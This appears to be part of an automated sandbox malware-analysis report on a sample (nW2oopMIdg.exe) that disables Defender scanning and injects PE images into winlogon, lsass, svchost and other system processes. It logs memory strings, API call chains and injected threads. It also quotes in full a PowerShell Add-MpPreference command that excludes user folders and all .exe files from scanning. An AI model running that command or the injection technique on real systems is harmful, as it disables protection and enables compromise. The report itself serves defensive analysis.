          Source: dwm.exe, 00000029.00000002.3298424961.0000011607ED0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: PointVMware&P
          Source: dwm.exe, 00000029.00000002.3298424961.0000011607ED0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000=
          Source: lsass.exe, 00000027.00000002.3282721187.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2075994281.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.2080553669.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.3282343059.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.3294606031.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000043.00000000.2110935253.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000044.00000000.2113125759.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000044.00000002.3280647396.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: dwm.exe, 00000029.00000002.3298424961.0000011607ED0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: C:\Windows\System32\dialer.exe API call chain: ExitProcess graph end node graph_25-413
          Source: C:\Windows\System32\dialer.exe API call chain: ExitProcess graph end node graph_62-477
          Source: C:\Windows\System32\dialer.exe API call chain: ExitProcess graph end node graph_65-91
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001E858987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 31_2_000001E858987D90
          Source: C:\Windows\System32\dialer.exe Code function: 65_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 65_2_00000001408460F0
          Source: C:\Windows\System32\dialer.exe Code function: 25_2_00000001400017EC GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree, 25_2_00000001400017EC
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Windows\System32\dialer.exe Process token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Windows\System32\dialer.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Code function: 0_2_00007FF7EB90118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 0_2_00007FF7EB90118B
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Code function: 0_2_00007FF7EB9011D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 0_2_00007FF7EB9011D8
          Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001E858987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 31_2_000001E858987D90
          Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001E85898D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 31_2_000001E85898D2A4
          Source: C:\ProgramData\Screenshots\Lightshot.exe Code function: 36_2_00007FF7B1C8118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 36_2_00007FF7B1C8118B
          Source: C:\ProgramData\Screenshots\Lightshot.exe Code function: 36_2_00007FF7B1C811D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 36_2_00007FF7B1C811D8
          Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000140AE867D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_00000140AE867D90
          Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000140AE86D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_00000140AE86D2A4
          Source: C:\Windows\System32\svchost.exe Code function: 40_2_00000195DD5CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 40_2_00000195DD5CD2A4
          Source: C:\Windows\System32\svchost.exe Code function: 40_2_00000195DD5C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 40_2_00000195DD5C7D90
          Source: C:\Windows\System32\dwm.exe Code function: 41_2_000001160CA4D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000001160CA4D2A4
          Source: C:\Windows\System32\dwm.exe Code function: 41_2_000001160CA47D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000001160CA47D90
          Source: C:\Windows\System32\dialer.exe Code function: 64_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 64_2_0000000140001160
          Source: C:\Windows\System32\svchost.exe Code function: 66_2_00000257E10AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 66_2_00000257E10AD2A4
          Source: C:\Windows\System32\svchost.exe Code function: 66_2_00000257E10A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 66_2_00000257E10A7D90
          Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001F28C937D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 67_2_000001F28C937D90
          Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001F28C93D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 67_2_000001F28C93D2A4
          Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001CA9854D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 68_2_000001CA9854D2A4
          Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001CA98547D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 68_2_000001CA98547D90
          Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001D265317D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 69_2_000001D265317D90
          Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001D26531D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 69_2_000001D26531D2A4

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\winlogon.exe base: 1E858950000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\lsass.exe base: 140ADFC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 195DD590000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dwm.exe base: 1160C9E0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\winlogon.exe base: 1E8589B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\lsass.exe base: 140AE890000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 195DE1A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dwm.exe base: 1160CA10000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 257E1070000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1F28C1D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1CA97FD0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1D2652E0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 254A27A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 24B87DA0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 205FB3C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1A205670000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 18EC1F30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 25CE3BC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 26238950000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2786E560000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1611FF70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 27C0F350000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1B279570000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1E70A460000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 22D13110000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 22C8C580000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2825F1D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20BAEC90000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1C782530000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\spoolsv.exe base: A60000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 24066EB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 181CEDB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2A142790000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 195B6F30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1428DC90000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1DBFA540000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1D76CCC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1A239D90000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17CFA390000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23FB7270000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DF53B50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 164E88A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25177B50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28D5D340000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 24EB5E10000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20859990000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F153C20000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D241D40000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 16FADAD0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 20E03070000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15204DB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 3340000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 175C5280000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22EF1B30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34F0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 261DE4D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 22E74520000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 226D8930000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13E5E930000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844140000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27234C50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28543540000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 2B684340000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 228CA7E0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 228B3E20000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EDA6AC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 15519600000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 185BB560000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 17F327F0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 197F36A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1C019C80000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1C01A710000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,25_2_0000000140001C88
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\winlogon.exe EIP: 5895273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\lsass.exe EIP: ADFC273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: DD59273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 589B273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: AE89273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: DE1A273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: CA1273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: E107273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 8C1D273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 97FD273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 652E273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: A27A273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 87DA273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: FB3C273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 567273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: C1F3273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: E3BC273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 3895273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 6E56273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 1FF7273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: F35273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 7957273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: A46273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 1311273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8C58273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5F1D273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5D9C273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: AEC9273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: DC1B273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8253273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: A6273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 66EB273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: FD9A273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: CEDB273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 4279273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: B6F3273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8DC9273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 7373273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: FA54273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 6CCC273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 39D9273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: FA39273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: B727273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 53B5273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: E88A273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 77B5273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5D34273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: B5E1273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5999273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 53C2273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 41D4273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: ADAD273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 307273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 4DB273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 334273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: C528273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 76AA273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: F1B3273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: F34F273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: DE4D273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 7452273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: A9D0273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: AF8C273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: D893273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5E93273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 4414273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 97E3273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: DC87273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 698D273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 34C5273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 4354273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8434273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5892273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: CA7E273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: B3E2273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: A6AC273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 1960273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: BB56273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 327F273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: F36A273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 19C8273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 1A71273C
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 195DD590000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 1160C9E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1E8589B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 140AE890000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 195DE1A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 1160CA10000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 257E1070000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2652E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 254A27A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24B87DA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 205FB3C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A205670000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 18EC1F30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 26238950000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2786E560000 value starts with: 4D5A
